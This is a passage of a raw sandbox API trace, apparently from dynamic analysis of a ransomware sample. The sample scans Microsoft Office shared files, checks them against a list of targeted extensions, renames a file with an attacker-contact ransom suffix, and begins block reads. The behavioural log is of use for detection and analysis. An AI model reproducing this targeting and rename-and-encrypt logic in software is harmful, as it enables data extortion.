lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0036.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0036.318] lstrlenW (lpString=".jpg") returned 4 [0036.318] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0036.318] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.318] lstrlenW (lpString="ipsplk.xml") returned 10 [0036.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.570] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2600) returned 1 [0036.570] CloseHandle (hObject=0x1c8) returned 1 [0036.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml")) returned 0x20 [0036.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString=".doc") returned 4 [0036.571] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString=".docx") returned 5 [0036.571] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0036.571] lstrlenW (lpString=".pdf") returned 4 [0036.571] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString=".xls") returned 4 [0036.571] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString=".xlsx") returned 5 [0036.571] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0036.571] lstrlenW (lpString=".ppt") returned 4 [0036.571] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString=".zip") returned 4 [0036.571] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.571] lstrlenW (lpString=".rar") returned 4 [0036.571] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString=".bz2") returned 4 [0036.571] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString=".7z") returned 3 [0036.571] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString=".dbf") returned 4 [0036.571] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString=".1cd") returned 4 [0036.571] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString=".jpg") returned 4 [0036.571] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.571] lstrlenW (lpString=".doc") returned 4 [0036.572] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString=".docx") returned 5 [0036.572] lstrcmpiW (lpString1=".docx", lpString2="k.xml") returned -1 [0036.572] lstrlenW (lpString=".pdf") returned 4 [0036.572] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString=".xls") returned 4 [0036.572] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString=".xlsx") returned 5 [0036.572] lstrcmpiW (lpString1=".xlsx", lpString2="k.xml") returned -1 [0036.572] lstrlenW (lpString=".ppt") returned 4 [0036.572] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.572] lstrlenW (lpString=".zip") returned 4 [0036.572] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.572] lstrlenW (lpString=".rar") returned 4 [0036.572] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString=".bz2") returned 4 [0036.572] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString=".7z") returned 3 [0036.572] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.572] lstrlenW (lpString=".dbf") returned 4 [0036.572] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.572] lstrlenW (lpString=".1cd") returned 4 [0036.572] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml") returned 61 [0036.572] lstrlenW (lpString=".jpg") returned 4 [0036.572] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.572] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.573] lstrlenW (lpString="ipssrb.xml") returned 10 [0036.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.573] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2568) returned 1 [0036.573] CloseHandle (hObject=0x1c8) returned 1 [0036.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml")) returned 0x20 [0036.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.573] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.573] lstrlenW (lpString=".doc") returned 4 [0036.573] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.573] lstrlenW (lpString=".docx") returned 5 [0036.573] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0036.573] lstrlenW (lpString=".pdf") returned 4 [0036.573] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.573] lstrlenW (lpString=".xls") returned 4 [0036.574] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString=".xlsx") returned 5 [0036.574] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0036.574] lstrlenW (lpString=".ppt") returned 4 [0036.574] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.574] lstrlenW (lpString=".zip") returned 4 [0036.574] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.574] lstrlenW (lpString=".rar") returned 4 [0036.574] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString=".bz2") returned 4 [0036.574] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString=".7z") returned 3 [0036.574] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.574] lstrlenW (lpString=".dbf") returned 4 [0036.574] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.574] lstrlenW (lpString=".1cd") returned 4 [0036.574] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.574] lstrlenW (lpString=".jpg") returned 4 [0036.574] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.574] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.574] lstrlenW (lpString=".doc") returned 4 [0036.574] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString=".docx") returned 5 [0036.574] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0036.574] lstrlenW (lpString=".pdf") returned 4 [0036.574] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.574] lstrlenW (lpString=".xls") returned 4 [0036.575] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.575] lstrlenW (lpString=".xlsx") returned 5 [0036.575] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0036.575] lstrlenW (lpString=".ppt") returned 4 [0036.575] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.575] lstrlenW (lpString=".zip") returned 4 [0036.575] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.575] lstrlenW (lpString=".rar") returned 4 [0036.575] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.575] lstrlenW (lpString=".bz2") returned 4 [0036.575] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.575] lstrlenW (lpString=".7z") returned 3 [0036.575] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.575] lstrlenW (lpString=".dbf") returned 4 [0036.575] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.575] lstrlenW (lpString=".1cd") returned 4 [0036.575] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.575] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml") returned 61 [0036.575] lstrlenW (lpString=".jpg") returned 4 [0036.575] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.575] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.575] lstrlenW (lpString="ipssrl.xml") returned 10 [0036.575] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.576] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2596) returned 1 [0036.576] CloseHandle (hObject=0x1c8) returned 1 [0036.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml")) returned 0x20 [0036.576] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.576] lstrlenW (lpString=".doc") returned 4 [0036.576] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.576] lstrlenW (lpString=".docx") returned 5 [0036.576] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0036.576] lstrlenW (lpString=".pdf") returned 4 [0036.576] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.576] lstrlenW (lpString=".xls") returned 4 [0036.576] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.576] lstrlenW (lpString=".xlsx") returned 5 [0036.576] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0036.576] lstrlenW (lpString=".ppt") returned 4 [0036.576] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.576] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.576] lstrlenW (lpString=".zip") returned 4 [0036.577] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.577] lstrlenW (lpString=".rar") returned 4 [0036.577] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString=".bz2") returned 4 [0036.577] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString=".7z") returned 3 [0036.577] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.577] lstrlenW (lpString=".dbf") returned 4 [0036.577] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.577] lstrlenW (lpString=".1cd") returned 4 [0036.577] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.577] lstrlenW (lpString=".jpg") returned 4 [0036.577] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.577] lstrlenW (lpString=".doc") returned 4 [0036.577] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString=".docx") returned 5 [0036.577] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0036.577] lstrlenW (lpString=".pdf") returned 4 [0036.577] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString=".xls") returned 4 [0036.577] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString=".xlsx") returned 5 [0036.577] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0036.577] lstrlenW (lpString=".ppt") returned 4 [0036.577] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.577] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.577] lstrlenW (lpString=".zip") returned 4 [0036.578] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.578] lstrlenW (lpString=".rar") returned 4 [0036.578] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.578] lstrlenW (lpString=".bz2") returned 4 [0036.578] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.578] lstrlenW (lpString=".7z") returned 3 [0036.578] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.578] lstrlenW (lpString=".dbf") returned 4 [0036.578] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.578] lstrlenW (lpString=".1cd") returned 4 [0036.578] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.578] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml") returned 61 [0036.578] lstrlenW (lpString=".jpg") returned 4 [0036.578] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.578] lstrcmpiW (lpString1=".xml", lpString2=".USA") returned 1 [0036.578] lstrlenW (lpString="ipssve.xml") returned 10 [0036.578] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.578] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2520) returned 1 [0036.579] CloseHandle (hObject=0x1c8) returned 1 [0036.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml")) returned 0x20 [0036.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.579] lstrlenW (lpString=".doc") returned 4 [0036.579] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.579] lstrlenW (lpString=".docx") returned 5 [0036.579] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0036.579] lstrlenW (lpString=".pdf") returned 4 [0036.579] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.579] lstrlenW (lpString=".xls") returned 4 [0036.579] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.579] lstrlenW (lpString=".xlsx") returned 5 [0036.579] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0036.579] lstrlenW (lpString=".ppt") returned 4 [0036.579] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.579] lstrlenW (lpString=".zip") returned 4 [0036.579] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.579] lstrlenW (lpString=".rar") returned 4 [0036.579] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.579] lstrlenW (lpString=".bz2") returned 4 [0036.579] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.579] lstrlenW (lpString=".7z") returned 3 [0036.579] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.580] lstrlenW (lpString=".dbf") returned 4 [0036.580] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.580] lstrlenW (lpString=".1cd") returned 4 [0036.580] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.580] lstrlenW (lpString=".jpg") returned 4 [0036.580] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.580] lstrlenW (lpString=".doc") returned 4 [0036.580] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString=".docx") returned 5 [0036.580] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0036.580] lstrlenW (lpString=".pdf") returned 4 [0036.580] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString=".xls") returned 4 [0036.580] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString=".xlsx") returned 5 [0036.580] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0036.580] lstrlenW (lpString=".ppt") returned 4 [0036.580] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.580] lstrlenW (lpString=".zip") returned 4 [0036.580] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.580] lstrlenW (lpString=".rar") returned 4 [0036.580] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString=".bz2") returned 4 [0036.580] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.580] lstrlenW (lpString=".7z") returned 3 [0036.580] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.581] lstrlenW (lpString=".dbf") returned 4 [0036.581] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.581] lstrlenW (lpString=".1cd") returned 4 [0036.581] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml") returned 61 [0036.581] lstrlenW (lpString=".jpg") returned 4 [0036.581] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.581] lstrcmpiW (lpString1=".CHM", lpString2=".USA") returned -1 [0036.581] lstrlenW (lpString="ADO210.CHM") returned 10 [0036.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.582] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=1680383) returned 1 [0036.582] CloseHandle (hObject=0x1c8) returned 1 [0036.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm")) returned 0x20 [0036.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0036.583] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0036.583] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defc6c | out: lpNewFilePointer=0x0) returned 1 [0036.583] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defc2c | out: lpNewFilePointer=0x0) returned 1 [0036.583] ReadFile (in: hFile=0x1c8, lpBuffer=0x3860058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2defc38, lpOverlapped=0x0 | out: lpBuffer=0x3860058*, lpNumberOfBytesRead=0x2defc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.589] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x2defc2c | out: lpNewFilePointer=0x0) returned 1 [0036.589] ReadFile (in: hFile=0x1c8, lpBuffer=0x38a0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2defc38, lpOverlapped=0x0 | out: lpBuffer=0x38a0058*, lpNumberOfBytesRead=0x2defc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.592] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2defc6c | out: 